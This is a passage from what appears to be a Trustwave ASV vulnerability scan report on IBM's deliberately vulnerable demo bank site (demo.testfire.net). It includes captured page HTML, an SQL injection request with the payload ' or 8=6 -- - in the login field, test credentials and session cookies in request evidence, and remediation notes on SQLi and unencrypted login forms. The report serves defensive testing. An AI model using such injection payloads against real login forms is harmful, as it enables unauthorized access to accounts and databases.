<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">

<div id="header" style="margin-bottom:5px; width: 99%;">


<form id="frmSearch" method="get" action="/search.jsp">
<table width="100%" border="0" cellpadding="0"
cellspacing="0">
<tr>
<td rowspan="2"><a id="HyperLink1" href="
/index.jsp"><img src="/images/logo.gif" width=283
height=80/></a></td>
<td align="right" valign="top">
<a id="LoginLink" href="/logout.jsp"><font
style="font-weight: bold; color: red;">Sign Off</font></a> | <a id="
HyperLink3" href="/index.jsp?content=inside_contact.htm">Contact
Us</a> | <a id="HyperLink4" href="/feedback.jsp">Feedback</a> |
<label for="txtSearch">Search</label>
<input type="text" name="query" id="query" accesskey="S" />
<input type="submit" value="Go" />
</td>
</tr>
<tr>
<td align="right" style="background-image:
url('/images/gradient.jpg');padding:0px;margin:0px;"><img src="
/images/header_pic.jpg" alt="" width=354 height=60/></td>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 257 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
</tr>
</table>
</form>
</div>

<table cellspacing="0" width="100%">


<tr>
<td width="25%" class="bt br bb"><div id="Header1"><img id="
Image1" src="/images/pf_lock.gif" width=12 height=14 style="vertical-
align: bottom;" alt="Secure Login"/> &nbsp; <a id="AccountLink"
href="/bank/main.jsp" class="focus" >MY ACCOUNT</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header2"><a id="
LinkHeader2" class="focus" href="/index.jsp?content=personal.htm"
>PERSONAL</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header3"><a id="
LinkHeader3" class="focus" href="/index.jsp?content=business.htm"
>SMALL BUSINESS</a></div></td>
<td width="25%" class="cc bt bb"><div id="Header4"><a id="
LinkHeader4" class="focus" href="/index.jsp?content=inside.htm"
>INSIDE ALTORO MUTUAL</a></div></td>
</tr>
<tr>

<!-- END HEADER -->

<div id="wrapper" style="width: 99%;">


<!-- MEMBER TOC BEGIN -->

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 258 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<table cellspacing="0" width="100%">

<td valign="top" class="cc br bb">


<br style="line-height: 10px;"/>
<b>I WANT TO ...</b>
<ul class="sidebar">
<li><a id="MenuHyperLink1" href="/bank/main.jsp">View
Account Summary</a></li>
<li><a id="MenuHyperLink2" href="/bank/transaction.jsp"
>View Recent Transactions</a></li>
<li><a id="MenuHyperLink3" href="/bank/transfer.jsp"
>Transfer Funds</a></li>
<!-- <li><a id="MenuHyperLink3" href="
/bank/stocks.jsp">Trade Stocks</a></li>-->

<li><a id="MenuHyperLink4" href="/bank/queryxpath.jsp"


>Search News Articles</a></li>
<li><a id="MenuHyperLink5" href="/bank/customize.jsp"
>Customize Site Language</a></li>
</ul>

<span id="_ctl0__ctl0_Content_Administration">
<br style="line-height: 10px;"/>
<b>ADMINISTRATION</b>
<ul class="sidebar">
<li><a href="/admin/admin.jsp"
>Edit Users</a></li>

</ul>
</span>

</td>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 259 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<!-- MEMBER TOC END -->
<td valign="top" colspan="3" class="bb">

<div class="fl" style="width: 99%;">

<h1>Hello Admin User


</h1>

<p>
Welcome to Altoro Mutual Online.
</p>

<form name="details" method="get" action="


showAccount">
<table border="0">
<TR valign="top">
<td>View Account Details:</td>
<td align="left">
<select size="1" name="listAccounts" id="
listAccounts">
<option value="800000" >800000
Corporate</option>
<option value="800001" >800001 Checking</option>
<option value="800002" >800002 Savings</option>
<option value="800003" >800003 Checking</option>
<option value="800004" >800004 Savings</option>
<option value="800005" >800005 Checking</option>
<option value="800006" >800006 Savings</option>
<option value="800007" >800007 Checking</option>
<option value="4539082039396288" >4539082039396288 Credit
Card</option>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 260 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<option value="4485983356242217" >4485983356242217 Credit
Card</option>
<option value="800008" >800008 Savings</option>

</select>
<input type="submit" id="btnGetAccount"
value=" GO ">
</td>
</tr>
<tr>
<td colspan="2"><span id="
_ctl0__ctl0_Content_Main_promo"><table width=590
border=0><tr><td><h2>Congratulations!
</h2></td></tr><tr><td>You have been pre-approved for an Altoro
Gold Visa with a credit limit of $10000!</td></tr><tr><td>Click <a
href='apply.jsp'>Here</a> to apply.
</td></tr></table></span></td>
</tr>
</table>
</form>

</div>
</td>
</div>

<!-- BEGIN FOOTER -->

</tr>
</table>
<div id="footer" style="width: 99%;">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 261 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
&copy;&nbsp;2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right">&nbsp;<a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
<br><br><br>
<div class="disclaimer">
The AltoroJ website is published by IBM Corporation for the sole
purpose of
demonstrating the effectiveness of IBM products in detecting web
application
vulnerabilities and website defects. This site is not a real banking
site. Similarities,
if any, to third party products and/or websites are purely
coincidental. This site is
provided "as is" without warranty of any kind, either express or
implied. IBM does
not assume any risk in relation to your use of this website. For
more information,
please go to <a id="HyperLink7" href="http://www-142.ibm.
com/software/products/us/en/subcategory/SWI10" >http://www-142.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 262 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
ibm.com/software/products/us/en/subcategory/SWI10</a>.<br /><br
/>

Copyright &copy; 2008, 2019, IBM Corporation, All rights


reserved.
</div>
</div>

</body>
</html>
<!-- END FOOTER -->
False Request: POST http://65.61.137.117/doLogin HTTP/1.1
Origin: http://65.61.137.117
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded

uid=%27+or+8%3D6+--+-&passw=Passwor1&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:28:57 GMT
Connection: close

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 263 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

<!-- BEGIN HEADER -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">

<div id="header" style="margin-bottom:5px; width: 99%;">


<form id="frmSearch" method="get" action="/search.jsp">
<table width="100%" border="0" cellpadding="0"
cellspacing="0">
<tr>
<td rowspan="2"><a id="HyperLink1" href="
/index.jsp"><img src="/images/logo.gif" width=283
height=80/></a></td>
<td align="right" valign="top">
<a id="LoginLink" href="/logout.jsp"><font
style="font-weight: bold; color: red;">Sign Off</font></a> | <a id="
HyperLink3" href="/index.jsp?content=inside_contact.htm">Contact
Us</a> | <a id="HyperLink4" href="/feedback.jsp">Feedback</a> |
<label for="txtSearch">Search</label>
<input type="text" name="query" id="query" accesskey="S" />
<input type="submit" value="Go" />

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 264 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
</td>
</tr>
<tr>
<td align="right" style="background-image:
url('/images/gradient.jpg');padding:0px;margin:0px;"><img src="
/images/header_pic.jpg" alt="" width=354 height=60/></td>
</tr>
</table>
</form>
</div>

<table cellspacing="0" width="100%">


<tr>
<td width="25%" class="bt br bb"><div id="Header1"><img id="
Image1" src="/images/pf_lock.gif" width=12 height=14 style="vertical-
align: bottom;" alt="Secure Login"/> &nbsp; <a id="AccountLink"
href="/bank/main.jsp" class="focus" >MY ACCOUNT</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header2"><a id="
LinkHeader2" class="focus" href="/index.jsp?content=personal.htm"
>PERSONAL</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header3"><a id="
LinkHeader3" class="focus" href="/index.jsp?content=business.htm"
>SMALL BUSINESS</a></div></td>
<td width="25%" class="cc bt bb"><div id="Header4"><a id="
LinkHeader4" class="focus" href="/index.jsp?content=inside.htm"
>INSIDE ALTORO MUTUAL</a></div></td>
</tr>
<tr>

<!-- END HEADER -->

<div id="wrapper" style="width: 99%;">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 265 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

<!-- TOC BEGIN -->


<td valign="top" class="cc br bb">
<br style="line-height: 10px;"/>

<a id="CatLink1" class="subheader" href="index.jsp?


content=personal.htm">PERSONAL</a>
<ul class="sidebar">
<li><a id="MenuHyperLink1" href="index.jsp?
content=personal_deposit.htm">Deposit Product</a></li>
<li><a id="MenuHyperLink2" href="index.jsp?
content=personal_checking.htm">Checking</a></li>
<li><a id="MenuHyperLink3" href="index.jsp?
content=personal_loans.htm">Loan Products</a></li>
<li><a id="MenuHyperLink4" href="index.jsp?
content=personal_cards.htm">Cards</a></li>
<li><a id="MenuHyperLink5" href="index.jsp?
content=personal_investments.htm">Investments &amp;
Insurance</a></li>
<li><a id="MenuHyperLink6" href="index.jsp?
content=personal_other.htm">Other Services</a></li>
</ul>

<a id="CatLink2" class="subheader" href="index.jsp?


content=business.htm">SMALL BUSINESS</a>
<ul class="sidebar">
<li><a id="MenuHyperLink7" href="index.jsp?
content=business_deposit.htm">Deposit Products</a></li>
<li><a id="MenuHyperLink8" href="index.jsp?
content=business_lending.htm">Lending Services</a></li>
<li><a id="MenuHyperLink9" href="index.jsp?
content=business_cards.htm">Cards</a></li>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 266 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<li><a id="MenuHyperLink10" href="index.jsp?
content=business_insurance.htm">Insurance</a></li>
<li><a id="MenuHyperLink11" href="index.jsp?
content=business_retirement.htm">Retirement</a></li>
<li><a id="MenuHyperLink12" href="index.jsp?
content=business_other.htm">Other Services</a></li>
</ul>

<a id="CatLink3" class="subheader" href="index.jsp?


content=inside.htm">INSIDE ALTORO MUTUAL</a>
<ul class="sidebar">
<li><a id="MenuHyperLink13" href="index.jsp?
content=inside_about.htm">About Us</a></li>
<li><a id="MenuHyperLink14" href="index.jsp?
content=inside_contact.htm">Contact Us</a></li>
<li><a id="MenuHyperLink15" href="cgi.exe"
>Locations</a></li>
<li><a id="MenuHyperLink16" href="index.jsp?
content=inside_investor.htm">Investor Relations</a></li>
<li><a id="MenuHyperLink17" href="index.jsp?
content=inside_press.htm">Press Room</a></li>
<li><a id="MenuHyperLink18" href="index.jsp?
content=inside_careers.htm">Careers</a></li>
<li><a id="MenuHyperLink19" href="
subscribe.jsp">Subscribe</a></li>
</ul>
</td>
<!-- TOC END -->

<td valign="top" colspan="3" class="bb">


<div class="fl" style="width: 99%;">

<h1>Online Banking Login</h1>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 267 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

<!-- To get the latest admin login, please contact


SiteOps at 415-555-6159 -->
<p><span id="_ctl0__ctl0_Content_Main_message"
style="color:#FF0066;font-size:12pt;font-weight:bold;">
Login Failed: We're sorry, but this username or
password was not found in our system. Please try again.
</span></p>

<form action="doLogin" method="post" name="login"


id="login" onsubmit="return (confirminput(login));">
<table>
<tr>
<td>
Username:
</td>
<td>
<input type="text" id="uid" name="uid"
value="" style="width: 150px;">
</td>
<td>
</td>
</tr>
<tr>
<td>
Password:
</td>
<td>
<input type="password" id="passw" name="
passw" style="width: 150px;">
</td>
</tr>
<tr>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 268 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<td></td>
<td>
<input type="submit" name="btnSubmit"
value="Login">
</td>
</tr>
</table>
</form>

</div>

<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {
document.login.passw.focus();
}
}

function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);
} else if (!(myform.uid.value.length)) {
myform.reset();
myform.uid.focus();
alert ("You must enter a valid username");
return (false);
} else {
myform.passw.focus();
alert ("You must enter a valid password");
return (false);

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 269 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
}
}
window.onload = setfocus;
</script>
</td>
</div>

<!-- BEGIN FOOTER -->

</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
&copy;&nbsp;2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right">&nbsp;<a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
<br><br><br>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 270 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<div class="disclaimer">
The AltoroJ website is published by IBM Corporation for the sole
purpose of
demonstrating the effectiveness of IBM products in detecting web
application
vulnerabilities and website defects. This site is not a real banking
site. Similarities,
if any, to third party products and/or websites are purely
coincidental. This site is
provided "as is" without warranty of any kind, either express or
implied. IBM does
not assume any risk in relation to your use of this website. For
more information,
please go to <a id="HyperLink7" href="http://www-
142.ibm.com/software/products/us/en/subcategory/SWI10"
>http://www-
142.ibm.com/software/products/us/en/subcategory/SWI10</a>.<br
/><br />

Copyright &copy; 2008, 2019, IBM Corporation, All rights reserved.


</div>
</div>

</body>
</html>
<!-- END FOOTER -->

Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 271 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
that are not explicitly allowed (i.e. a white-list). This list should be as
restrictive as possible. This is particularly important when the original
source of data is beyond the control of the application.

Please note that the listing of SQLi vulnerabilities is not an exhaustive


list, and other SQLi vulnerabilities may exist in the application.

19 Unencrypted Password 6.1 Medium Fail URL: http://demo.testfire.net/login.jsp


Form Port: tcp/80

A form in this web application which appears to be associated with


login credentials (i.e., username and/or password) does not utilize
encryption (HTTPS) for completed forms.

CVSSv2: AV:A/AC:L/Au:N/C:C/I:N/A:N
Service: http

Evidence:
DetectionDetails: GET - http://demo.testfire.net/login.jsp
Detected password form in a non-secure page
Request: GET http://demo.testfire.net/login.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=B95638AFC2EBB1AEEE06E0A48503002C

Remediation:

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 272 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
All login credentials should be transmitted using HTTPS, either
explicitly or from within a current HTTPS context.

20 Unencrypted Password 6.1 Medium Fail URL: http://65.61.137.117:8080/login.jsp


Form Port: tcp/8080

A form in this web application which appears to be associated with


login credentials (i.e., username and/or password) does not utilize
encryption (HTTPS) for completed forms.

CVSSv2: AV:A/AC:L/Au:N/C:C/I:N/A:N
Service: http

Evidence:
DetectionDetails: GET - http://65.61.137.117:8080/login.jsp
Detected password form in a non-secure page
Request: GET http://65.61.137.117:8080/login.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=76AA5AC0228D700D9219ED73F9533B78

Remediation:
All login credentials should be transmitted using HTTPS, either
explicitly or from within a current HTTPS context.

21 Insecure transmission of 6.1 Medium Fail URL: http://65.61.137.117/doLogin


Port: tcp/80

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 273 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

credentials
When the authentication information like username or password is
passed to the server via an HTTP GET request, it is supplied using
query string parameters present in the URL. As a result, this
information might be easily available on proxy or web server logs.
Similarly, if such information is sent using HTTP POST request or using
cookies over an unencrypted connection, it is prone to a man-in-the-
middle attack.

CVSSv2: AV:A/AC:L/Au:N/C:C/I:N/A:N
Service: http

Evidence:
DetectionDetails: Login credentials found in the POST request body
POST - http://65.61.137.117/doLogin
uid=CHSuser contains CHSuser
passw=Passwor1 contains Passwor1

Request: POST http://65.61.137.117/doLogin HTTP/1.1


Cookie: JSESSIONID=7DEA7694E36255C4C48824F9A0DE4E13
Origin: http://65.61.137.117
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 42
Content-Type: application/x-www-form-urlencoded

uid=CHSuser&passw=Passwor1&btnSubmit=Login

Remediation:
All login credentials should be transmitted using HTTPS using a POST

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 274 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
request.

22 Unencrypted Password 6.1 Medium Fail URL: http://demo.testfire.net:8080/login.jsp


Form Port: tcp/8080

A form in this web application which appears to be associated with


login credentials (i.e., username and/or password) does not utilize
encryption (HTTPS) for completed forms.

CVSSv2: AV:A/AC:L/Au:N/C:C/I:N/A:N
Service: http

Evidence:
DetectionDetails: GET - http://demo.testfire.net:8080/login.jsp
Detected password form in a non-secure page
Request: GET http://demo.testfire.net:8080/login.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=03939398EA63CCAEE93295DC28E42282

Remediation:
All login credentials should be transmitted using HTTPS, either
explicitly or from within a current HTTPS context.

23 Unencrypted Password 6.1 Medium Fail URL: http://demo.testfire.net:8080/doLogin


Form Port: tcp/8080

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 275 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
A form in this web application which appears to be associated with
login credentials (i.e., username and/or password) does not utilize
encryption (HTTPS) for completed forms.

CVSSv2: AV:A/AC:L/Au:N/C:C/I:N/A:N
Service: http

Evidence:
DetectionDetails: POST - http://demo.testfire.net:8080/doLogin
Detected password form in a non-secure page
Request: POST http://demo.testfire.net:8080/doLogin HTTP/1.1
Cookie: JSESSIONID=03939398EA63CCAEE93295DC28E42282
Origin: http://demo.testfire.net:8080
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net:8080/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 42
Content-Type: application/x-www-form-urlencoded

uid=CHSuser&passw=Passwor1&btnSubmit=Login

Remediation:
All login credentials should be transmitted using HTTPS, either
explicitly or from within a current HTTPS context.

24 Insecure transmission of 6.1 Medium Fail URL: http://65.61.137.117:8080/doLogin


credentials Port: tcp/8080

When the authentication information like username or password is


passed to the server via an HTTP GET request, it is supplied using

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 276 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
query string parameters present in the URL. As a result, this
information might be easily available on proxy or web server logs.
Similarly, if such information is sent using HTTP POST request or using
cookies over an unencrypted connection, it is prone to a man-in-the-
middle attack.

CVSSv2: AV:A/AC:L/Au:N/C:C/I:N/A:N
Service: http

Evidence:
DetectionDetails: Login credentials found in the POST request body
POST - http://65.61.137.117:8080/doLogin
uid=CHSuser contains CHSuser
passw=Passwor1 contains Passwor1

Request: POST http://65.61.137.117:8080/doLogin HTTP/1.1


Cookie: JSESSIONID=76AA5AC0228D700D9219ED73F9533B78
Origin: http://65.61.137.117:8080
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117:8080/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 42
Content-Type: application/x-www-form-urlencoded

uid=CHSuser&passw=Passwor1&btnSubmit=Login

Remediation:
All login credentials should be transmitted using HTTPS using a POST
request.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 277 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

25 Insecure transmission of 6.1 Medium Fail URL: http://demo.testfire.net/doLogin


credentials Port: tcp/80

When the authentication information like username or password is


passed to the server via an HTTP GET request, it is supplied using
query string parameters present in the URL. As a result, this
information might be easily available on proxy or web server logs.
Similarly, if such information is sent using HTTP POST request or using
cookies over an unencrypted connection, it is prone to a man-in-the-
middle attack.

CVSSv2: AV:A/AC:L/Au:N/C:C/I:N/A:N
Service: http

Evidence:
DetectionDetails: Login credentials found in the POST request body
POST - http://demo.testfire.net/doLogin
uid=CHSuser contains CHSuser
passw=Passwor1 contains Passwor1

Request: POST http://demo.testfire.net/doLogin HTTP/1.1


Cookie: JSESSIONID=B95638AFC2EBB1AEEE06E0A48503002C
Origin: http://demo.testfire.net
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 42
Content-Type: application/x-www-form-urlencoded

uid=CHSuser&passw=Passwor1&btnSubmit=Login

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 278 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Remediation:
All login credentials should be transmitted using HTTPS using a POST
request.

